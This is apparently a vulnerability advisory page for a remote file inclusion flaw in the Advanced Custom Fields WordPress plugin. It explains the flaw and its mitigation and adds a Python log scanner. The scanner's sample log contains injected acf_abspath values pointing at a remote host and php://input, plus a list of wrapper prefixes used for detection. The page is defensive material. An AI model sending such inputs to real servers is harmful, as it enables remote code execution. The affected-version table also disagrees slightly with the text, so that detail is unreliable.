CVE-2012-10025
BaseFortify
Publication date: 2025-08-05
Last updated on: 2025-08-07
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | advanced_custom_fields | 3.5.1 |
| wordpress | advanced_custom_fields | 3.5.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-98 | The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a remote file inclusion (RFI) issue in the WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below. It occurs in the core/actions/export.php file. If the PHP configuration directive allow_url_include is enabled, an unauthenticated attacker can supply a remote location in the acf_abspath POST parameter, causing the server to include and execute arbitrary remote PHP code. The result is remote code execution with the privileges of the web server user.
How can this vulnerability impact me?
The vulnerability can lead to remote code execution on the affected server, allowing an attacker to fully compromise the host. This means the attacker can execute arbitrary commands, potentially gaining control over the web server and access to sensitive data or resources.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately disable the PHP configuration directive allow_url_include if it is enabled. Additionally, update the Advanced Custom Fields (ACF) WordPress plugin to a version higher than 3.5.1 where this vulnerability is fixed. Restrict access to the vulnerable export.php file and monitor for any suspicious POST requests involving the acf_abspath parameter.
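As an added illustration of the monitoring step above (example code written for this page, not BaseFortify's or the ACF plugin's own code), the Python below scans a request log that records POST bodies for export.php requests whose acf_abspath value names a remote URL or a PHP stream wrapper, and checks a php.ini fragment to see whether allow_url_include is effectively enabled. The log line format, the wp-content/plugins/advanced-custom-fields/ path prefix and the sample entries are all constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of a request log that records POST bodies (as a WAF audit
# log or application-level request logging would). Ordinary access logs do not
# contain bodies, so they cannot be used for this check.
SAMPLE_LOG = """\
2025-08-05T10:00:01Z POST /wp-content/plugins/advanced-custom-fields/core/actions/export.php body="acf_abspath=/var/www/html/&nonce=abc"
2025-08-05T10:00:02Z POST /wp-content/plugins/advanced-custom-fields/core/actions/export.php body="acf_abspath=http://198.51.100.7/x.txt"
2025-08-05T10:00:03Z POST /wp-content/plugins/advanced-custom-fields/core/actions/export.php body="acf_abspath=php://input"
2025-08-05T10:00:04Z GET /wp-login.php body=""
2025-08-05T10:00:05Z POST /wp-content/plugins/advanced-custom-fields/core/actions/export.php body="acf_abspath=https%3A%2F%2F198.51.100.7%2Fy"
"""

# Constructed log format: <timestamp> <method> <path> body="<urlencoded body>"
LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body="(?P<body>[^"]*)"$')

# Prefixes that turn an include() target into a remote or request-controlled
# source when allow_url_include is on (URL schemes and PHP stream wrappers).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")


def is_suspicious(value: str) -> bool:
    """True if an acf_abspath value points at a remote or wrapper-backed source."""
    return value.strip().lower().startswith(REMOTE_PREFIXES)


def scan(log_text: str) -> list:
    """Return POST requests to export.php whose acf_abspath looks like RFI input."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].endswith("/core/actions/export.php"):
            continue
        # parse_qs percent-decodes, so encoded schemes are normalised before the check
        params = parse_qs(m["body"], keep_blank_values=True)
        for value in params.get("acf_abspath", []):
            if is_suspicious(value):
                hits.append({"ts": m["ts"], "path": m["path"], "acf_abspath": value})
    return hits


def allow_url_include_enabled(ini_text: str) -> bool:
    """Parse a php.ini fragment; PHP treats On/1/true/yes as enabled and defaults to Off.
    The last assignment wins, as it does in php.ini itself."""
    enabled = False
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop comments
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        if key.strip().lower() == "allow_url_include":
            enabled = val.strip().strip('"').lower() in ("1", "on", "true", "yes")
    return enabled


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} suspicious acf_abspath={hit['acf_abspath']!r}")
    # Constructed php.ini fragment: the commented line is ignored, the last assignment wins.
    print("allow_url_include enabled:", allow_url_include_enabled("; allow_url_include = On\nallow_url_include = Off\n"))
```

The two checks are complementary: a hit from scan() tells you someone is probing the parameter, while allow_url_include_enabled() tells you whether such a request could actually succeed. Neither replaces the fix itself, which is disabling allow_url_include and updating the plugin.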